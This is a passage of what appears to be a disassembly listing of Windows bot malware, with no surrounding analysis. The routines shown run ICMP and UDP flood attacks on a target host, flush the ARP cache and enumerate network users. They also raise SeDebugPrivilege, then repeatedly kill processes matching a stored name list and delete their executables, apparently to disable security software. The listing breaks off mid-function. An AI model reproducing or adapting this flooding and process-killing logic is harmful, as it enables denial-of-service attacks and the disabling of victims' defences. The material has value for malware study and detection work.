push eax
call sub_414415
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 24h
jmp short loc_407B9A
; ---------------------------------------------------------------------------
loc_407B29: ; CODE XREF: sub_407A8B+62�j
; sub_407A8B+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_407BAD
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_407B9A
loc_407B37: ; CODE XREF: sub_407A8B+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_407B76
push dword ptr [edi]
push offset aS_3 ; " %S"
push eax
call sub_414415
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_407B37
jmp short loc_407B9A
; ---------------------------------------------------------------------------
loc_407B76: ; CODE XREF: sub_407A8B+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_414415
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 1Ch
loc_407B9A: ; CODE XREF: sub_407A8B+9C�j
; sub_407A8B+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_407BAD
push edi
call dword_435840
xor edi, edi
mov [ebp+var_4], edi
loc_407BAD: ; CODE XREF: sub_407A8B+A3�j
; sub_407A8B+114�j
cmp [ebp+var_10], 0EAh
jz loc_407ACA
cmp edi, esi
pop ebx
jz short loc_407BC6
push edi
call dword_435840
loc_407BC6: ; CODE XREF: sub_407A8B+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_414415
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_407A8B endp
; =============== S U B R O U T I N E =======================================
sub_407BFF proc near ; CODE XREF: sub_4024A4+7�p
; sub_40398A+7D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43587C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_407C27
push [esp+arg_0]
call dword_435868 ; gethostbyname
test eax, eax
jnz short loc_407C20
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_407C20: ; CODE XREF: sub_407BFF+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_407C27: ; CODE XREF: sub_407BFF+D�j
retn
sub_407BFF endp
; =============== S U B R O U T I N E =======================================
sub_407C28 proc near ; CODE XREF: sub_40887D+138�p
mov ecx, dword_4358EC
xor eax, eax
test ecx, ecx
jz short locret_407C36
jmp ecx
; ---------------------------------------------------------------------------
locret_407C36: ; CODE XREF: sub_407C28+A�j
retn
sub_407C28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_407C37 proc near ; CODE XREF: sub_4089DC:loc_40CFA3�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_435814 ; GetIpNetTable
mov ecx, eax
sub ecx, ebx
jz short loc_407CC7
sub ecx, 32h
jz loc_407D0E
sub ecx, 48h
jz short loc_407C92
sub ecx, 6Eh
jz short loc_407C8B
loc_407C77: ; CODE XREF: sub_407C37+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_414415
add esp, 0Ch
jmp short loc_407CEF
; ---------------------------------------------------------------------------
loc_407C8B: ; CODE XREF: sub_407C37+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_407CE4
; ---------------------------------------------------------------------------
loc_407C92: ; CODE XREF: sub_407C37+39�j
push [ebp+78h+var_8]
call sub_414CAD
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_407CDF
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_435814 ; GetIpNetTable
cmp eax, ebx
jnz short loc_407C77
loc_407CC7: ; CODE XREF: sub_407C37+2B�j
cmp [esi], ebx
jbe short loc_407CFC
lea edi, [esi+4]
loc_407CCE: ; CODE XREF: sub_407C37+A4�j
push edi
call dword_435874 ; DeleteIpNetEntry
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_407CCE
jmp short loc_407CFC
; ---------------------------------------------------------------------------
loc_407CDF: ; CODE XREF: sub_407C37+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_407CE4: ; CODE XREF: sub_407C37+59�j
; sub_407C37+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_414415
pop ecx
pop ecx
loc_407CEF: ; CODE XREF: sub_407C37+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401EFF
pop ecx
loc_407CFC: ; CODE XREF: sub_407C37+92�j
; sub_407C37+A6�j
push esi
call sub_414844
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407C37+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_407CE4
sub_407C37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D15 proc near ; CODE XREF: sub_401141+21B�p
; sub_401141+32A�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_435780 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_436490
push esi
call sub_414415
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_407D15 endp
; =============== S U B R O U T I N E =======================================
sub_407D6B proc near ; CODE XREF: sub_4021B5+249�p
; sub_4021B5+274�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_407D96
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_407D89: ; CODE XREF: sub_407D6B+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_407D89
pop edi
jmp short loc_407D9A
; ---------------------------------------------------------------------------
loc_407D96: ; CODE XREF: sub_407D6B+A�j
mov esi, [esp+4+arg_0]
loc_407D9A: ; CODE XREF: sub_407D6B+29�j
test ecx, ecx
jz short loc_407DA3
movzx eax, byte ptr [esi]
add edx, eax
loc_407DA3: ; CODE XREF: sub_407D6B+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_407D6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407DBB proc near ; DATA XREF: sub_4089DC+549D�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_414630
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_435858 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_43587C ; inet_addr
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_407E14
lea eax, [ebp+var_C0]
push eax
call dword_435868 ; gethostbyname
test eax, eax
jz short loc_407E1A
loc_407E14: ; CODE XREF: sub_407DBB+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_407E78
loc_407E1A: ; CODE XREF: sub_407DBB+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_407E5C
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4056BF
add esp, 14h
loc_407E5C: ; CODE XREF: sub_407DBB+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401EFF
push [ebp+var_30]
call sub_41255E
pop ecx
pop ecx
push ebx
jmp loc_407F3D
; ---------------------------------------------------------------------------
loc_407E78: ; CODE XREF: sub_407DBB+5D�j
test eax, eax
jz short loc_407E88
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_407E8B
; ---------------------------------------------------------------------------
loc_407E88: ; CODE XREF: sub_407DBB+BF�j
mov [ebp+var_4], esi
loc_407E8B: ; CODE XREF: sub_407DBB+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_407EA6
mov [ebp+var_3C], eax
loc_407EA6: ; CODE XREF: sub_407DBB+E6�j
cmp [ebp+var_38], ebx
jge short loc_407EAE
mov [ebp+var_38], ebx
loc_407EAE: ; CODE XREF: sub_407DBB+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_407EDD
loc_407EB7: ; CODE XREF: sub_407DBB+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4358F0 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_407EB7
loc_407EDD: ; CODE XREF: sub_407DBB+FA�j
push [ebp+arg_0]
call dword_43588C ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_407F26
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4056BF
add esp, 14h
loc_407F26: ; CODE XREF: sub_407DBB+149�j
lea eax, [ebp+var_344]
push eax
call sub_401EFF
push [ebp+var_30]
call sub_41255E
pop ecx
pop ecx
push edi
loc_407F3D: ; CODE XREF: sub_407DBB+B8�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_407DBB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F44 proc near ; DATA XREF: sub_4089DC+55ED�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_414630
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
pop ecx
push 11h
push 2
push 2
call dword_435808 ; socket
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_43587C ; inet_addr
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40801F
lea eax, [ebp+var_B4]
push eax
call dword_435868 ; gethostbyname
mov ecx, eax
cmp ecx, edi
jnz short loc_40801F
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_408003
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4056BF
add esp, 14h
loc_408003: ; CODE XREF: sub_407F44+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401EFF
push [ebp+var_24]
call sub_41255E
pop ecx
pop ecx
push esi
jmp loc_408158
; ---------------------------------------------------------------------------
loc_40801F: ; CODE XREF: sub_407F44+6A�j
; sub_407F44+7D�j
cmp [ebp+var_28], edi
jge short loc_408027
mov [ebp+var_28], edi
loc_408027: ; CODE XREF: sub_407F44+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_408034
mov [ebp+var_28], eax
loc_408034: ; CODE XREF: sub_407F44+EB�j
cmp ecx, edi
jz short loc_40803F
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_408042
; ---------------------------------------------------------------------------
loc_40803F: ; CODE XREF: sub_407F44+F2�j
lea eax, [ebp+arg_0]
loc_408042: ; CODE XREF: sub_407F44+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_40805D
call sub_4145D1
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_408060
; ---------------------------------------------------------------------------
loc_40805D: ; CODE XREF: sub_407F44+106�j
push [ebp+var_28]
loc_408060: ; CODE XREF: sub_407F44+117�j
call dword_435954 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_40807E
mov [ebp+var_2C], esi
loc_40807E: ; CODE XREF: sub_407F44+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_4080F9
loc_408085: ; CODE XREF: sub_407F44+159�j
call sub_4145D1
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_408085
jmp short loc_4080F9
; ---------------------------------------------------------------------------
loc_4080A1: ; CODE XREF: sub_407F44+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_4080A7: ; CODE XREF: sub_407F44+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_4145D1
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_4357D8 ; sendto
push [ebp+var_2C]
call ds:dword_420000 ; Sleep
dec esi
jnz short loc_4080A7
cmp [ebp+var_28], edi
jnz short loc_4080F9
call sub_4145D1
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_435954 ; htons
mov [ebp+var_12], ax
loc_4080F9: ; CODE XREF: sub_407F44+13F�j
; sub_407F44+15B�j ...
cmp [ebp+var_34], edi
jg short loc_4080A1
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_408141
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4056BF
add esp, 14h
loc_408141: ; CODE XREF: sub_407F44+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401EFF
push [ebp+var_24]
call sub_41255E
pop ecx
pop ecx
push edi
loc_408158: ; CODE XREF: sub_407F44+D6�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_407F44 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40815F proc near ; CODE XREF: sub_40378E+45�p
; sub_40378E+165�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_4200E0 ; GetCurrentProcess
push eax
call dword_43593C ; OpenProcessToken
test eax, eax
jnz short loc_40817E
leave
retn
; ---------------------------------------------------------------------------
loc_40817E: ; CODE XREF: sub_40815F+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_435924 ; LookupPrivilegeValueA
test eax, eax
jz short loc_4081BC
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_4081A5
or [ebp+var_8], 2
jmp short loc_4081A9
; ---------------------------------------------------------------------------
loc_4081A5: ; CODE XREF: sub_40815F+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_4081A9: ; CODE XREF: sub_40815F+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_435870 ; AdjustTokenPrivileges
mov esi, eax
loc_4081BC: ; CODE XREF: sub_40815F+32�j
push [ebp+var_4]
call ds:dword_42003C ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_40815F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081CA proc near ; CODE XREF: sub_4084DD+68�p
; sub_4085DF+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_4357F8, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_4083DB
cmp dword_435854, ebx
jz loc_4083DB
cmp dword_4357B8, ebx
jz loc_4083DB
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40815F
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4357F8 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_4083CE
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_435854 ; Process32First
test eax, eax
mov esi, ds:dword_42003C
jz loc_4083C9
lea eax, [ebp+var_12C]
push eax
push edi
call dword_4357B8 ; Process32Next
test eax, eax
jz loc_4083C9
mov ebx, ds:dword_420078
loc_408289: ; CODE XREF: sub_4081CA+1F7�j
cmp [ebp+arg_10], 0
jz short loc_4082EA
xor edi, edi
loc_408291: ; CODE XREF: sub_4081CA+E7�j
push off_42B4D0[edi]
lea eax, [ebp+var_108]
push eax
call ds:dword_4200EC ; lstrcmpi
test eax, eax
jz short loc_4082B8
add edi, 4
cmp edi, 9E0h
jb short loc_408291
jmp loc_4083AF
; ---------------------------------------------------------------------------
loc_4082B8: ; CODE XREF: sub_4081CA+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_4083AF
push 0
push edi
call ds:dword_4200E8 ; TerminateProcess
test eax, eax
jnz loc_4083AF
loc_4082E2: ; CODE XREF: sub_4081CA+1AF�j
push edi
call esi ; CloseHandle
jmp loc_4083AF
; ---------------------------------------------------------------------------
loc_4082EA: ; CODE XREF: sub_4081CA+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_40837E
cmp [ebp+arg_4], edi
jz loc_4083AF
push [ebp+var_124]
push 8
call dword_4357F8 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_40833E
lea eax, [ebp+var_350]
push eax
push edi
call dword_435820 ; Module32First
test eax, eax
push [ebp+var_124]
jz short loc_408344
lea eax, [ebp+var_230]
jmp short loc_40834A
; ---------------------------------------------------------------------------
loc_40833E: ; CODE XREF: sub_4081CA+152�j
push [ebp+var_124]
loc_408344: ; CODE XREF: sub_4081CA+16A�j
lea eax, [ebp+var_108]
loc_40834A: ; CODE XREF: sub_4081CA+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_414415
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
jmp loc_4082E2
; ---------------------------------------------------------------------------
loc_40837E: ; CODE XREF: sub_4081CA+125�j
lea eax, [ebp+var_108]
loc_408384: ; CODE XREF: sub_4081CA+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_4083A6
test cl, cl
jz short loc_4083A2
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_4083A6
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_408384
loc_4083A2: ; CODE XREF: sub_4081CA+1C4�j
xor eax, eax
jmp short loc_4083AB
; ---------------------------------------------------------------------------
loc_4083A6: ; CODE XREF: sub_4081CA+1C0�j
; sub_4081CA+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4083AB: ; CODE XREF: sub_4081CA+1DA�j
test eax, eax
jz short loc_4083E2
loc_4083AF: ; CODE XREF: sub_4081CA+E9�j
; sub_4081CA+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_4357B8 ; Process32Next
test eax, eax
jnz loc_408289
xor ebx, ebx
loc_4083C9: ; CODE XREF: sub_4081CA+9D�j
; sub_4081CA+B3�j
push [ebp+var_4]
call esi ; CloseHandle
loc_4083CE: ; CODE XREF: sub_4081CA+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40815F
pop ecx
pop ecx
loc_4083DB: ; CODE XREF: sub_4081CA+3A�j
; sub_4081CA+46�j ...
xor eax, eax
loc_4083DD: ; CODE XREF: sub_4081CA+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4083E2: ; CODE XREF: sub_4081CA+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+var_124]
mov edi, eax
push 8
call dword_4357F8 ; CreateToolhelp32Snapshot
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi ; CloseHandle
push 0
push edi
call ds:dword_4200E8 ; TerminateProcess
test eax, eax
jnz short loc_408427
push edi
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
jmp short loc_4083DB
; ---------------------------------------------------------------------------
loc_408427: ; CODE XREF: sub_4081CA+253�j
cmp [ebp+arg_18], 0
jz loc_4084D5
lea eax, [ebp+var_350]
push eax
push ebx
call dword_435820 ; Module32First
test eax, eax
jz short loc_40849A
push ebx
call esi ; CloseHandle
xor esi, esi
loc_408448: ; CODE XREF: sub_4081CA+2B2�j
push 7D0h
call ds:dword_420000 ; Sleep
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call ds:dword_4200CC ; SetFileAttributesA
lea eax, [ebp+var_230]
push eax
call ds:dword_4200E4 ; DeleteFileA
test eax, eax
setnz al
test al, al
jnz short loc_40848C
cmp esi, 5
jl short loc_408448
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_4084A6
; ---------------------------------------------------------------------------
loc_40848C: ; CODE XREF: sub_4081CA+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_4084A6
; ---------------------------------------------------------------------------
loc_40849A: ; CODE XREF: sub_4081CA+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_4084A6: ; CODE XREF: sub_4081CA+2C0�j
; sub_4081CA+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_4084D5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_4084D5: ; CODE XREF: sub_4081CA+261�j
; sub_4081CA+2EF�j
xor eax, eax
inc eax
jmp loc_4083DD
sub_4081CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4084DD proc near ; DATA XREF: sub_4089DC+4800�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_414415
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_408535
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4056BF
add esp, 14h
loc_408535: ; CODE XREF: sub_4084DD+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_4081CA
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_40855E
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_408563
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4084DD+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_408563: ; CODE XREF: sub_4084DD+7F�j
push eax
call sub_414415
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_40858A
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4056BF
add esp, 14h
loc_40858A: ; CODE XREF: sub_4084DD+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401EFF
push [ebp+74h+var_14]
call sub_41255E
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_4084DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4085A8 proc near ; CODE XREF: sub_4089DC+3961�p
; sub_412383+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_420078 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_4085DA
push 0
push esi
call ds:dword_4200E8 ; TerminateProcess
test eax, eax
jnz short loc_4085DA
push esi
xor edi, edi
call ds:dword_42003C ; CloseHandle
loc_4085DA: ; CODE XREF: sub_4085A8+1A�j
; sub_4085A8+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4085A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4085DF proc near ; DATA XREF: sub_4089DC+1EDC�o
push esi
xor esi, esi
loc_4085E2: ; CODE XREF: sub_4085DF+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_4081CA
add esp, 1Ch
push dword_42B4C8
call ds:dword_420000 ; Sleep
jmp short loc_4085E2
sub_4085DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_408601 proc near ; CODE XREF: sub_40887D+D0�p
var_1E1C = byte ptr -1E1Ch
